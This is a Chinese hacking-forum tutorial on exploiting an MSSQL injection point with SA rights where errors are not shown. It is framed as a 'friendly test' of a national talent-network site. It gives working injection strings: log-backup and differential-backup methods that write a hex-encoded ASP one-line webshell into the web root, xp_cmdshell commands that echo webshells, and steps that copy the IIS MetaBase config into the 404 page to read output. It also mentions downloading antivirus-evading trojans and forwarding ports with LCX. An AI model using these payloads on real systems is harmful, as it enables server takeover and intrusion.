sa权限的教程.

admin

————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
2 M, n* v& Z( |% v: J' v% n
! l$ w+ @9 r2 m6 {" l
' a  _2 f8 C2 [) q) ~' e                                                             欢迎高手访问指导，欢迎新手朋友交流学习。
0 n/ b8 n+ R0 I  J9 [
                                                                 
                                                                 
                                                                  论坛： http://www.90team.net/


1 n) d: F6 g" j% X
7 M9 R& E! D: R4 w6 Y' A* S+ E友情检测国家人才网
# }. V% C4 W$ G

内容：MSSQL注入SA权限不显错模式下的入侵


一般新手扫到不显错的SA（systemadmin）的注入点时，虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了，今天我给大家演示下如何利用。方法很简单大家看操作。

我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
$ T! c+ E1 X! m) A! `9 l

这里的主机环境：MSSQL+JSP 权限为不显错的SA，支持多行执行 xp_cmdshell存活 服务器处于内网，WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003，IIS，404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
2 ~. t& e* {9 t9 `) Z
0 Q  ?. i0 b) b, ^8 d: i思路：
* F- P$ o( I. N: E
" ?3 L- T" [1 ^" G# l首先：
0 d1 Z" j1 g: [; g5 a0 g) G
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面，然后访问WEB站点的一个不存在的目录得到命令执行结果，刺探服务器信息。
, H4 j1 i- H  z1 C% |; J
0 l$ ]6 w& U! ?7 k! g, a4 g1.日志备份获得Webshell
( Y3 M0 m2 a8 A8 K" ]$ }1 z% I& z
2.数据库差异备份获得Webshell

4.直接下载免杀远控木马。

5.直接下载LCX将服务器端口转发出来

7 u: d% s0 b* T/ q9 b5 V6.通过XP_CMDSHELL 执行命令读取iis配置文件（C:\Windows\system32\inetsrv\MetaBase.xml ）分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
; s! w+ J* D( [9 s2 I9 h

1 q! L- W9 P# {$ O
在这里我就不浪费大家时间了，我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了，

; K- D6 }3 U! C4 `7 d- u我直接演示后面一个方法


分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL


  M& c. l- c9 p$ F& K* S% n
) e, K7 O! ^% j) w( d% {
◆日志备份：
* W) z$ {0 E, `! ^6 d$ B3 y

% u# e5 H9 p' V" k  \& E* k' ]) j1. 进行初始备份
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--

  K" c- r0 i) ^6 [9 H2. 插入数据
4 [# R  U- k8 M5 c2 E) R;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
* x6 N9 z4 r0 a! ~
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
  
2 J1 L0 N  d" m9 R3. 备份并获得文件，删除临时表
8 d) E8 b3 G8 ~8 Q  u9 ~;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
0 C8 ~3 g" O6 [6 g+ u- F
; W( q; C- V* I9 D- D

◆数据库差异备份

（1. 进行差异备份准备工作

4 Y$ w9 V7 R# W  y5 j3 J;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
6 [/ D6 H" M! r8 f5 a5 ?
上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
5 e; U* H7 ^' Y4 M( S1 D1 |7 l1 N
+ f: E; B/ A% K* ^6 [& _/ P, ~
3 d" }' F: r3 a! ]% Q! G（2. 将数据写入到数据库
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--

7 k, _+ `; a/ t. P1 n0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
- |9 [; S6 R, H/ Q' V' Y* E8 ?) ]
3. 备份数据库并清理临时文件
! E+ Z  A  r" s) i% \
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
5 _8 `& J3 \3 U$ l7 O
: B: q" v2 k0 B/ e2 G5 k- H0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
9 H$ I) V% L* V1 ]
# `0 I( N5 H# m  V1 n6 N( T

用^转义字符来写ASP(一句话木马)文件的方法:   
  ?8 x, d% Y( L3 ?/ d% y" W6 b
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--

1 q1 l& V, I; g0 D8 U/ L8 [& E* W  Q6 s2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp

$ V+ H# T7 B. Q! k读取IIS配置信息获取web路径
& X# P/ G7 x- m: y
     
: j9 p4 _) o' g4 p2 a$ }+ o' \( Q     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--

执行命令
* W3 K2 I: W) L8 r     
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
. u1 E4 R6 E0 b$ ^% ~

/ |9 E' |% I" O* x9 i8 d
8 u* k% [' x- L. i

1 ?' j" b& ?3 B

% K! t3 j- u+ z


0 y1 g+ H( _  d) M4 l  S

: A! C' P2 X/ g: _3 r

; w+ b. Q% b2 h- h: C2 g
/ D  Y- A' O! g& D2 e# n! S1 K) A
- ^" S: E" B" ~" R. J/ Z
$ i4 H9 L; t+ Z( _
. Y: l/ N. n& [7 i
$ \2 k0 o) }8 k. j2 R




( m; g& ]3 m$ T( B
1 y% g3 V" N: }, {0 _( }

% T+ w# y7 w: n$ p* \) i# j
3 \. |5 Z8 K7 P
  y) a' Q0 P$ z' b/ `- {2 B

( N. Z" B, d0 C6 \2 \3 H& T

0 `# B( m4 ?6 m" [, j8 p2 W


. w9 H' M' H. d( B
3 }5 [% ~3 T" w

/ p4 ^7 t1 n* A2 O1 \
/ v9 o% W  Y! o) a4 u  R! l+ S* D
2 h. r# e  D; x
; e  p, b/ \5 k3 w% t" S$ \; F9 D; t





( N9 W2 L) P8 w: [1 K